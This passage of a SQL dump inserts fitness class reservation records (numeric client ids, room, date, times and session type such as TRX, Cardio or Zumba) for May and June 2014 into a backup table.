(1240, 98, 'CTR', '2014-05-10', '11h00', '11h30', 'TRX'),
(1236, 80, 'CTR', '2014-05-09', '18h15', '18h45', 'Circuit Training'),
(1237, 73, 'CTR', '2014-05-10', '11h00', '11h30', 'TRX'),
(1238, 95, 'CTR', '2014-05-10', '11h00', '11h30', 'TRX'),
(1239, 98, 'CTR', '2014-05-10', '11h00', '11h30', 'TRX'),
(1241, 98, 'CTR', '2014-05-10', '11h00', '11h30', 'TRX'),
(1242, 14, 'CTR', '2014-05-11', '11h00', '11h30', 'Circuit Training'),
(1243, 41, 'CTR', '2014-05-13', '18h15', '18h45', 'TRX'),
(1244, 41, 'CTR', '2014-05-15', '19h45', '20h45', 'ZUMBA'),
(1245, 48, 'CTR', '2014-05-11', '11h00', '11h30', 'Circuit Training'),
(1246, 31, 'CTR', '2014-05-11', '11h00', '11h30', 'Circuit Training'),
(1247, 100, 'CTR', '2014-05-12', '19h45', '20h45', 'ZUMBA'),
(1248, 100, 'CTR', '2014-05-13', '17h30', '18h00', 'Cardio'),
(1249, 100, 'CTR', '2014-05-13', '19h00', '19h30', 'Circuit Training'),
(1250, 48, 'CTR', '2014-05-12', '18h15', '18h45', 'Circuit Training'),
(1251, 100, 'CTR', '2014-05-12', '18h15', '18h45', 'Circuit Training'),
(1252, 100, 'CTR', '2014-05-15', '19h00', '19h30', 'Cardio'),
(1253, 100, 'CTR', '2014-05-15', '19h45', '20h45', 'ZUMBA'),
(1254, 89, 'CTR', '2014-05-12', '19h00', '19h30', 'Renforcement Musculaire'),
(1255, 94, 'CTR', '2014-05-12', '19h00', '19h30', 'Renforcement Musculaire'),
(1265, 62, 'CTR', '2014-05-12', '19h00', '19h30', 'Renforcement Musculaire'),
(1266, 78, 'CTR', '2014-05-13', '18h15', '18h45', 'TRX'),
(1258, 93, 'CTR', '2014-05-12', '19h00', '19h30', 'Renforcement Musculaire'),
(1259, 32, 'CTR', '2014-05-12', '19h45', '20h45', 'ZUMBA'),
(1260, 19, 'CTR', '2014-05-13', '17h30', '18h00', 'Cardio'),
(1304, 40, 'CTR', '2014-05-15', '18h15', '18h45', 'Renforcement musculaire'),
(1262, 92, 'CTR', '2014-05-13', '17h30', '18h00', 'Cardio'),
(1263, 26, 'CTR', '2014-05-14', '18h15', '18h45', 'Cardio'),
(1264, 26, 'CTR', '2014-05-16', '18h15', '18h45', 'Circuit Training'),
(1267, 99, 'CTR', '2014-05-13', '17h30', '18h00', 'Cardio'),
(1268, 65, 'CTR', '2014-05-13', '19h00', '19h30', 'Circuit Training'),
(1269, 80, 'CTR', '2014-05-13', '19h00', '19h30', 'Circuit Training'),
(1270, 44, 'CTR', '2014-05-13', '18h15', '18h45', 'TRX'),
(1271, 103, 'CTR', '2014-05-14', '18h15', '18h45', 'Cardio'),
(1272, 40, 'CTR', '2014-05-13', '18h15', '18h45', 'TRX'),
(1273, 37, 'CTR', '2014-05-13', '17h30', '18h00', 'Cardio'),
(1274, 17, 'CTR', '2014-05-13', '17h30', '18h00', 'Cardio'),
(1275, 24, 'CTR', '2014-05-13', '17h30', '18h00', 'Cardio'),
(1276, 24, 'CTR', '2014-05-13', '19h00', '19h30', 'Circuit Training'),
(1289, 24, 'CTR', '2014-05-15', '19h00', '19h30', 'Cardio'),
(1278, 24, 'CTR', '2014-05-15', '18h15', '18h45', 'Renforcement musculaire'),
(1279, 73, 'CTR', '2014-05-13', '19h00', '19h30', 'Circuit Training'),
(1280, 47, 'CTR', '2014-05-16', '17h30', '18h00', 'TRX'),
(1282, 13, 'CTR', '2014-05-13', '18h15', '18h45', 'TRX'),
(1283, 57, 'CTR', '2014-05-14', '18h15', '18h45', 'Cardio'),
(1284, 105, 'CTR', '2014-05-16', '18h15', '18h45', 'Circuit Training'),
(1285, 40, 'CTR', '2014-05-14', '17h30', '18h00', 'Renforcement Musculaire'),
(1286, 29, 'CTR', '2014-05-14', '17h30', '18h00', 'Renforcement Musculaire'),
(1287, 100, 'CTR', '2014-05-16', '18h15', '18h45', 'Circuit Training'),
(1288, 28, 'CTR', '2014-05-14', '17h30', '18h00', 'Renforcement Musculaire'),
(1291, 69, 'CTR', '2014-05-14', '18h15', '18h45', 'Cardio'),
(1292, 38, 'CTR', '2014-05-14', '18h15', '18h45', 'Cardio'),
(1293, 22, 'CTR', '2014-05-14', '18h15', '18h45', 'Cardio'),
(1294, 69, 'CTR', '2014-05-21', '18h15', '18h45', 'Cardio'),
(1389, 80, 'CTR', '2014-05-21', '19h00', '19h30', 'TRX'),
(1384, 26, 'CTR', '2014-05-21', '19h00', '19h30', 'TRX'),
(1388, 103, 'CTR', '2014-05-21', '19h00', '19h30', 'TRX'),
(1298, 38, 'CTR', '2014-05-21', '18h15', '18h45', 'Cardio'),
(1390, 30, 'CTR', '2014-05-20', '18h15', '18h45', 'TRX'),
(1393, 47, 'CTR', '2014-05-23', '17h30', '18h00', 'TRX'),
(1303, 51, 'CTR', '2014-05-14', '17h30', '18h00', 'Renforcement Musculaire'),
(1302, 80, 'CTR', '2014-05-21', '18h15', '18h45', 'Cardio'),
(1315, 104, 'CTR', '2014-05-16', '18h15', '18h45', 'Circuit Training'),
(1306, 19, 'CTR', '2014-05-15', '18h15', '18h45', 'Renforcement musculaire'),
(1307, 19, 'CTR', '2014-05-15', '19h00', '19h30', 'Cardio'),
(1309, 38, 'CTR', '2014-05-15', '19h00', '19h30', 'Cardio'),
(1310, 37, 'CTR', '2014-05-15', '19h00', '19h30', 'Cardio'),
(1311, 106, 'CTR', '2014-05-18', '11h00', '11h30', 'Circuit Training'),
(1312, 17, 'CTR', '2014-05-15', '19h00', '19h30', 'Cardio'),
(1313, 14, 'CTR', '2014-05-15', '19h00', '19h30', 'Cardio'),
(1314, 42, 'CTR', '2014-05-15', '19h45', '20h45', 'ZUMBA'),
(1316, 108, 'CTR', '2014-05-18', '11h00', '11h30', 'Circuit Training'),
(1317, 80, 'CTR', '2014-05-18', '11h00', '11h30', 'Circuit Training'),
(1318, 31, 'CTR', '2014-05-16', '18h15', '18h45', 'Circuit Training'),
(1319, 56, 'CTR', '2014-05-16', '18h15', '18h45', 'Circuit Training'),
(1320, 56, 'CTR', '2014-05-16', '17h30', '18h00', 'TRX'),
(1321, 63, 'CTR', '2014-05-16', '17h30', '18h00', 'TRX'),
(1322, 40, 'CTR', '2014-05-16', '17h30', '18h00', 'TRX'),
(1323, 107, 'CTR', '2014-05-17', '11h00', '11h30', 'TRX'),
(1324, 48, 'CTR', '2014-05-18', '11h00', '11h30', 'Circuit Training'),
(1325, 95, 'CTR', '2014-05-18', '11h00', '11h30', 'Circuit Training'),
(1326, 31, 'CTR', '2014-05-18', '11h00', '11h30', 'Circuit Training'),
(1327, 106, 'CTR', '2014-05-22', '18h15', '18h45', 'Renforcement musculaire'),
(1493, 111, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1492, 13, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1491, 41, 'CTR', '2014-05-28', '18h15', '18h45', 'Cardio'),
(1490, 24, 'CTR', '2014-05-27', '19h00', '19h30', 'Circuit Training'),
(1489, 24, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1540, 48, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1369, 53, 'CTR', '2014-05-21', '18h15', '18h45', 'Cardio'),
(1348, 41, 'CTR', '2014-05-20', '18h15', '18h45', 'TRX'),
(1349, 41, 'CTR', '2014-05-22', '19h45', '20h45', 'ZUMBA');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(1350, 26, 'CTR', '2014-05-19', '18h15', '18h45', 'Circuit Training'),
(1351, 26, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1357, 32, 'CTR', '2014-05-19', '18h15', '18h45', 'Circuit Training'),
(1407, 80, 'CTR', '2014-05-25', '11h00', '11h30', 'Circuit Training'),
(1406, 13, 'CTR', '2014-05-21', '17h30', '18h00', 'Renforcement Musculaire'),
(1358, 105, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1359, 89, 'CTR', '2014-05-19', '19h00', '19h30', 'Renforcement Musculaire'),
(1368, 62, 'CTR', '2014-05-19', '19h00', '19h30', 'Renforcement Musculaire'),
(1361, 93, 'CTR', '2014-05-19', '19h00', '19h30', 'Renforcement Musculaire'),
(1370, 54, 'CTR', '2014-05-21', '18h15', '18h45', 'Cardio'),
(1363, 92, 'CTR', '2014-05-19', '18h15', '18h45', 'Circuit Training'),
(1364, 102, 'CTR', '2014-05-19', '18h15', '18h45', 'Circuit Training'),
(1365, 53, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1366, 54, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1371, 33, 'CTR', '2014-05-21', '17h30', '18h00', 'Renforcement Musculaire'),
(1372, 33, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1373, 100, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1374, 100, 'CTR', '2014-05-22', '19h45', '20h45', 'ZUMBA'),
(1376, 100, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1377, 44, 'CTR', '2014-05-20', '18h15', '18h45', 'TRX'),
(1378, 44, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1379, 19, 'CTR', '2014-05-20', '18h15', '18h45', 'TRX'),
(1380, 19, 'CTR', '2014-05-22', '17h30', '18h00', 'Circuit Training'),
(1381, 40, 'CTR', '2014-05-20', '18h15', '18h45', 'TRX'),
(1382, 34, 'CTR', '2014-05-21', '17h30', '18h00', 'Renforcement Musculaire'),
(1383, 14, 'CTR', '2014-05-20', '18h15', '18h45', 'TRX'),
(1386, 57, 'CTR', '2014-05-21', '19h00', '19h30', 'TRX'),
(1387, 104, 'CTR', '2014-05-21', '19h00', '19h30', 'TRX'),
(1395, 97, 'CTR', '2014-05-21', '17h30', '18h00', 'Renforcement Musculaire'),
(1396, 111, 'CTR', '2014-05-21', '19h00', '19h30', 'TRX'),
(1434, 104, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1398, 24, 'CTR', '2014-05-21', '17h30', '18h00', 'Renforcement Musculaire'),
(1399, 24, 'CTR', '2014-05-22', '17h30', '18h00', 'Circuit Training'),
(1400, 24, 'CTR', '2014-05-22', '18h15', '18h45', 'Renforcement musculaire'),
(1401, 51, 'CTR', '2014-05-21', '17h30', '18h00', 'Renforcement Musculaire'),
(1402, 29, 'CTR', '2014-05-21', '17h30', '18h00', 'Renforcement Musculaire'),
(1410, 40, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1404, 80, 'CTR', '2014-05-21', '19h00', '19h30', 'TRX'),
(1405, 17, 'CTR', '2014-05-21', '18h15', '18h45', 'Cardio'),
(1408, 31, 'CTR', '2014-05-22', '18h15', '18h45', 'Renforcement musculaire'),
(1409, 31, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1411, 40, 'CTR', '2014-05-22', '17h30', '18h00', 'Circuit Training'),
(1412, 40, 'CTR', '2014-05-22', '18h15', '18h45', 'Renforcement musculaire'),
(1413, 97, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1414, 65, 'CTR', '2014-05-23', '17h30', '18h00', 'TRX'),
(1415, 99, 'CTR', '2014-05-22', '19h45', '20h45', 'ZUMBA'),
(1416, 69, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1417, 48, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1418, 95, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1419, 17, 'CTR', '2014-05-22', '17h30', '18h00', 'Circuit Training'),
(1420, 103, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1421, 98, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1422, 32, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1423, 32, 'CTR', '2014-05-22', '19h45', '20h45', 'ZUMBA'),
(1424, 48, 'CTR', '2014-05-23', '19h00', '19h30', 'Renforcement Musculaire'),
(1487, 19, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1426, 41, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1428, 14, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1429, 98, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1430, 107, 'CTR', '2014-05-22', '19h00', '19h30', 'Cardio'),
(1431, 31, 'CTR', '2014-05-23', '19h00', '19h30', 'Renforcement Musculaire'),
(1432, 40, 'CTR', '2014-05-23', '17h30', '18h00', 'TRX'),
(1433, 41, 'CTR', '2014-05-23', '17h30', '18h00', 'TRX'),
(1435, 80, 'CTR', '2014-05-23', '18h15', '18h45', 'Circuit Training'),
(1436, 63, 'CTR', '2014-05-23', '17h30', '18h00', 'TRX'),
(1438, 14, 'CTR', '2014-05-25', '11h00', '11h30', 'Circuit Training'),
(1439, 31, 'CTR', '2014-05-25', '11h00', '11h30', 'Circuit Training'),
(1440, 57, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1441, 103, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1442, 26, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1443, 112, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1444, 104, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1445, 113, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1446, 29, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1447, 53, 'CTR', '2014-05-28', '18h15', '18h45', 'Cardio'),
(1448, 69, 'CTR', '2014-05-28', '18h15', '18h45', 'Cardio'),
(1449, 54, 'CTR', '2014-05-28', '18h15', '18h45', 'Cardio'),
(1450, 80, 'CTR', '2014-05-28', '18h15', '18h45', 'Cardio'),
(1451, 22, 'CTR', '2014-05-28', '18h15', '18h45', 'Cardio'),
(1486, 19, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1468, 89, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1454, 21, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1455, 20, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1456, 106, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1457, 40, 'CTR', '2014-05-26', '17h30', '18h00', 'TRX'),
(1460, 40, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1461, 92, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1462, 65, 'CTR', '2014-05-26', '18h15', '18h45', 'Circuit Training'),
(1463, 108, 'CTR', '2014-05-26', '18h15', '18h45', 'Circuit Training'),
(1464, 28, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1465, 28, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1466, 51, 'CTR', '2014-05-26', '17h30', '18h00', 'TRX'),
(1467, 51, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1469, 94, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1470, 88, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1471, 87, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1472, 93, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1473, 62, 'CTR', '2014-05-26', '19h00', '19h30', 'Renforcement Musculaire'),
(1485, 34, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1475, 13, 'CTR', '2014-05-26', '17h30', '18h00', 'TRX'),
(1476, 80, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1477, 80, 'CTR', '2014-05-28', '19h00', '19h30', 'TRX'),
(1478, 47, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1479, 80, 'CTR', '2014-05-28', '16h45', '17h15', 'Séance spéciale sportifs'),
(1480, 80, 'CTR', '2014-05-28', '16h45', '17h15', 'Séance spéciale sportifs'),
(1481, 14, 'CTR', '2014-05-27', '18h15', '18h45', 'TRX'),
(1482, 14, 'CTR', '2014-05-27', '19h00', '19h30', 'Circuit Training'),
(1483, 80, 'CTR', '2014-05-28', '18h15', '18h45', 'Cardio'),
(1484, 33, 'CTR', '2014-05-28', '17h30', '18h00', 'Renforcement Musculaire'),
(1488, 100, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1542, 111, 'CTR', '2014-05-31', '11h00', '11h30', 'TRX'),
(1589, 14, 'CTR', '2014-06-05', '19h00', '19h30', 'Cardio'),
(1496, 105, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1497, 30, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1546, 106, 'CTR', '2014-05-31', '11h00', '11h30', 'TRX'),
(1499, 41, 'CTR', '2014-06-02', '19h45', '20h45', 'ZUMBA'),
(1500, 41, 'CTR', '2014-06-03', '18h15', '18h45', 'TRX'),
(1525, 22, 'CTR', '2014-06-04', '18h15', '18h45', 'Cardio'),
(1502, 41, 'CTR', '2014-06-05', '19h45', '20h45', 'ZUMBA'),
(1503, 41, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1504, 40, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1505, 22, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1506, 69, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1507, 53, 'CTR', '2014-05-30', '17h30', '18h00', 'TRX'),
(1508, 113, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1509, 104, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1510, 26, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1511, 112, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1512, 80, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1513, 80, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1514, 115, 'CTR', '2014-06-04', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1515, 114, 'CTR', '2014-06-04', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1516, 40, 'CTR', '2014-06-04', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1517, 29, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1518, 51, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1519, 97, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1524, 41, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1521, 13, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1580, 33, 'CTR', '2014-06-05', '17h30', '18h00', 'Circuit Training'),
(1547, 101, 'CTR', '2014-05-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1526, 53, 'CTR', '2014-06-04', '18h15', '18h45', 'Cardio'),
(1527, 116, 'CTR', '2014-06-04', '18h15', '18h45', 'Cardio'),
(1528, 54, 'CTR', '2014-06-04', '18h15', '18h45', 'Cardio'),
(1529, 69, 'CTR', '2014-06-04', '18h15', '18h45', 'Cardio'),
(1600, 108, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1531, 26, 'CTR', '2014-06-04', '19h00', '19h30', 'TRX'),
(1532, 57, 'CTR', '2014-06-04', '19h00', '19h30', 'TRX'),
(1533, 118, 'CTR', '2014-06-04', '19h00', '19h30', 'TRX'),
(1534, 119, 'CTR', '2014-06-04', '19h00', '19h30', 'TRX'),
(1535, 103, 'CTR', '2014-06-04', '19h00', '19h30', 'TRX'),
(1536, 104, 'CTR', '2014-06-04', '19h00', '19h30', 'TRX'),
(1631, 27, 'CTR', '2014-06-11', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1538, 113, 'CTR', '2014-06-04', '19h00', '19h30', 'TRX'),
(1541, 31, 'CTR', '2014-05-30', '18h15', '18h45', 'Circuit Training'),
(1548, 44, 'CTR', '2014-05-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1544, 19, 'CTR', '2014-06-03', '17h30', '18h00', 'Cardio'),
(1545, 19, 'CTR', '2014-06-05', '17h30', '18h00', 'Circuit Training'),
(1549, 32, 'CTR', '2014-05-30', '19h45', '20h15', 'Cardio'),
(1550, 31, 'CTR', '2014-05-31', '11h00', '11h30', 'TRX'),
(1551, 31, 'CTR', '2014-06-01', '11h00', '11h30', 'Circuit Training'),
(1552, 31, 'CTR', '2014-06-06', '18h15', '18h45', 'Circuit Training'),
(1560, 120, 'CTR', '2014-06-04', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1561, 13, 'CTR', '2014-06-02', '17h30', '18h00', 'TRX'),
(1555, 48, 'CTR', '2014-05-31', '11h00', '11h30', 'TRX'),
(1556, 95, 'CTR', '2014-05-31', '11h00', '11h30', 'TRX'),
(1557, 44, 'CTR', '2014-06-03', '18h15', '18h45', 'TRX'),
(1558, 44, 'CTR', '2014-06-06', '19h00', '19h30', 'Renforcement Musculaire'),
(1559, 14, 'CTR', '2014-06-01', '11h00', '11h30', 'Circuit Training'),
(1562, 99, 'CTR', '2014-06-02', '19h45', '20h45', 'ZUMBA'),
(1563, 99, 'CTR', '2014-06-03', '17h30', '18h00', 'Cardio'),
(1564, 99, 'CTR', '2014-06-05', '17h30', '18h00', 'Circuit Training'),
(1565, 21, 'CTR', '2014-06-02', '19h00', '19h30', 'Renforcement Musculaire'),
(1566, 20, 'CTR', '2014-06-02', '19h00', '19h30', 'Renforcement Musculaire'),
(1568, 40, 'CTR', '2014-06-03', '18h15', '18h45', 'TRX'),
(1569, 40, 'CTR', '2014-06-02', '19h00', '19h30', 'Renforcement Musculaire'),
(1585, 87, 'CTR', '2014-06-02', '19h00', '19h30', 'Renforcement Musculaire'),
(1586, 65, 'CTR', '2014-06-05', '19h45', '20h45', 'ZUMBA'),
(1588, 14, 'CTR', '2014-06-03', '18h15', '18h45', 'TRX'),
(1574, 93, 'CTR', '2014-06-02', '19h00', '19h30', 'Renforcement Musculaire'),
(1575, 35, 'CTR', '2014-06-03', '17h30', '18h00', 'Cardio'),
(1576, 32, 'CTR', '2014-06-02', '19h45', '20h45', 'ZUMBA'),
(1577, 37, 'CTR', '2014-06-02', '17h30', '18h00', 'TRX'),
(1578, 80, 'CTR', '2014-06-04', '18h15', '18h45', 'Cardio'),
(1579, 80, 'CTR', '2014-06-04', '18h15', '18h45', 'Cardio'),
(1581, 34, 'CTR', '2014-06-05', '17h30', '18h00', 'Circuit Training'),
(1582, 47, 'CTR', '2014-06-06', '17h30', '18h00', 'TRX'),
(1583, 27, 'CTR', '2014-06-04', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1584, 51, 'CTR', '2014-06-02', '17h30', '18h00', 'TRX'),
(1590, 100, 'CTR', '2014-06-06', '18h15', '18h45', 'Circuit Training'),
(1591, 30, 'CTR', '2014-06-03', '18h15', '18h45', 'TRX'),
(1592, 62, 'CTR', '2014-06-03', '18h15', '18h45', 'TRX'),
(1593, 60, 'CTR', '2014-06-03', '18h15', '18h45', 'TRX'),
(1594, 31, 'CTR', '2014-06-07', '11h00', '11h30', 'TRX'),
(1595, 31, 'CTR', '2014-06-08', '11h00', '11h30', 'Circuit Training'),
(1596, 80, 'CTR', '2014-06-04', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1597, 80, 'CTR', '2014-06-04', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1598, 106, 'CTR', '2014-06-05', '17h30', '18h00', 'Circuit Training'),
(1601, 48, 'CTR', '2014-06-07', '11h00', '11h30', 'TRX'),
(1602, 105, 'CTR', '2014-06-06', '18h15', '18h45', 'Circuit Training'),
(1603, 101, 'CTR', '2014-06-06', '19h00', '19h30', 'Renforcement Musculaire'),
(1604, 107, 'CTR', '2014-06-04', '17h30', '18h00', 'Renforcement Musculaire'),
(1605, 54, 'CTR', '2014-06-06', '18h15', '18h45', 'Circuit Training'),
(1607, 69, 'CTR', '2014-06-06', '18h15', '18h45', 'Circuit Training'),
(1608, 111, 'CTR', '2014-06-05', '19h45', '20h45', 'ZUMBA'),
(1609, 111, 'CTR', '2014-06-07', '11h00', '11h30', 'TRX'),
(1632, 114, 'CTR', '2014-06-11', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1611, 111, 'CTR', '2014-06-14', '11h00', '11h30', 'TRX'),
(1612, 53, 'CTR', '2014-06-05', '18h15', '18h45', 'Renforcement musculaire'),
(1613, 104, 'CTR', '2014-06-06', '18h15', '18h45', 'Circuit Training'),
(1614, 27, 'CTR', '2014-06-06', '17h30', '18h00', 'TRX'),
(1615, 35, 'CTR', '2014-06-05', '19h00', '19h30', 'Cardio'),
(1616, 35, 'CTR', '2014-06-08', '11h00', '11h30', 'Circuit Training'),
(1617, 56, 'CTR', '2014-06-06', '17h30', '18h00', 'TRX'),
(1618, 32, 'CTR', '2014-06-05', '19h45', '20h45', 'ZUMBA'),
(1619, 40, 'CTR', '2014-06-05', '18h15', '18h45', 'Renforcement musculaire'),
(1620, 53, 'CTR', '2014-06-10', '18h15', '18h45', 'TRX'),
(1621, 54, 'CTR', '2014-06-10', '18h15', '18h45', 'TRX'),
(1622, 92, 'CTR', '2014-06-06', '19h00', '19h30', 'Renforcement Musculaire'),
(1623, 14, 'CTR', '2014-06-10', '18h15', '18h45', 'TRX'),
(1624, 100, 'CTR', '2014-06-10', '19h00', '19h30', 'Circuit Training'),
(1625, 100, 'CTR', '2014-06-12', '19h45', '20h45', 'ZUMBA'),
(1627, 119, 'CTR', '2014-06-06', '18h15', '18h45', 'Circuit Training'),
(1628, 30, 'CTR', '2014-06-10', '18h15', '18h45', 'TRX'),
(1629, 63, 'CTR', '2014-06-06', '17h30', '18h00', 'TRX'),
(1633, 122, 'CTR', '2014-06-11', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1634, 115, 'CTR', '2014-06-11', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1699, 80, 'CTR', '2014-06-12', '17h30', '18h00', 'Circuit Training'),
(1636, 13, 'CTR', '2014-06-11', '17h30', '18h00', 'Renforcement Musculaire'),
(1637, 28, 'CTR', '2014-06-11', '17h30', '18h00', 'Renforcement Musculaire'),
(1638, 29, 'CTR', '2014-06-11', '17h30', '18h00', 'Renforcement Musculaire'),
(1686, 34, 'CTR', '2014-06-12', '17h30', '18h00', 'Circuit Training'),
(1640, 97, 'CTR', '2014-06-11', '17h30', '18h00', 'Renforcement Musculaire'),
(1641, 107, 'CTR', '2014-06-11', '17h30', '18h00', 'Renforcement Musculaire'),
(1642, 22, 'CTR', '2014-06-11', '18h15', '18h45', 'Cardio'),
(1643, 53, 'CTR', '2014-06-11', '18h15', '18h45', 'Cardio'),
(1703, 48, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1645, 69, 'CTR', '2014-06-11', '18h15', '18h45', 'Cardio'),
(1646, 116, 'CTR', '2014-06-11', '18h15', '18h45', 'Cardio'),
(1647, 125, 'CTR', '2014-06-11', '18h15', '18h45', 'Cardio'),
(1648, 124, 'CTR', '2014-06-11', '18h15', '18h45', 'Cardio'),
(1649, 26, 'CTR', '2014-06-11', '19h00', '19h30', 'TRX'),
(1651, 103, 'CTR', '2014-06-11', '19h00', '19h30', 'TRX'),
(1652, 104, 'CTR', '2014-06-11', '19h00', '19h30', 'TRX'),
(1653, 112, 'CTR', '2014-06-11', '19h00', '19h30', 'TRX'),
(1654, 118, 'CTR', '2014-06-11', '19h00', '19h30', 'TRX'),
(1655, 119, 'CTR', '2014-06-11', '19h00', '19h30', 'TRX'),
(1656, 41, 'CTR', '2014-06-10', '18h15', '18h45', 'TRX'),
(1657, 41, 'CTR', '2014-06-12', '19h45', '20h45', 'ZUMBA'),
(1761, 87, 'CTR', '2014-06-16', '19h00', '19h30', 'Renforcement Musculaire'),
(1764, 106, 'CTR', '2014-06-16', '19h00', '19h30', 'Renforcement Musculaire'),
(1660, 44, 'CTR', '2014-06-10', '18h15', '18h45', 'TRX'),
(1661, 44, 'CTR', '2014-06-13', '19h00', '19h30', 'Renforcement Musculaire'),
(1662, 95, 'CTR', '2014-06-10', '19h00', '19h30', 'Circuit Training'),
(1663, 98, 'CTR', '2014-06-10', '19h00', '19h30', 'Circuit Training'),
(1664, 108, 'CTR', '2014-06-10', '19h00', '19h30', 'Circuit Training'),
(1665, 89, 'CTR', '2014-06-10', '19h00', '19h30', 'Circuit Training'),
(1666, 93, 'CTR', '2014-06-10', '19h00', '19h30', 'Circuit Training'),
(1667, 80, 'CTR', '2014-06-10', '18h15', '18h45', 'TRX'),
(1668, 117, 'CTR', '2014-06-18', '18h15', '18h45', 'Cardio'),
(1669, 19, 'CTR', '2014-06-10', '17h30', '18h00', 'Cardio'),
(1692, 101, 'CTR', '2014-06-13', '19h00', '19h30', 'Renforcement Musculaire'),
(1671, 35, 'CTR', '2014-06-10', '17h30', '18h00', 'Cardio'),
(1672, 24, 'CTR', '2014-06-12', '17h30', '18h00', 'Circuit Training'),
(1673, 24, 'CTR', '2014-06-12', '18h15', '18h45', 'Renforcement musculaire'),
(1708, 104, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
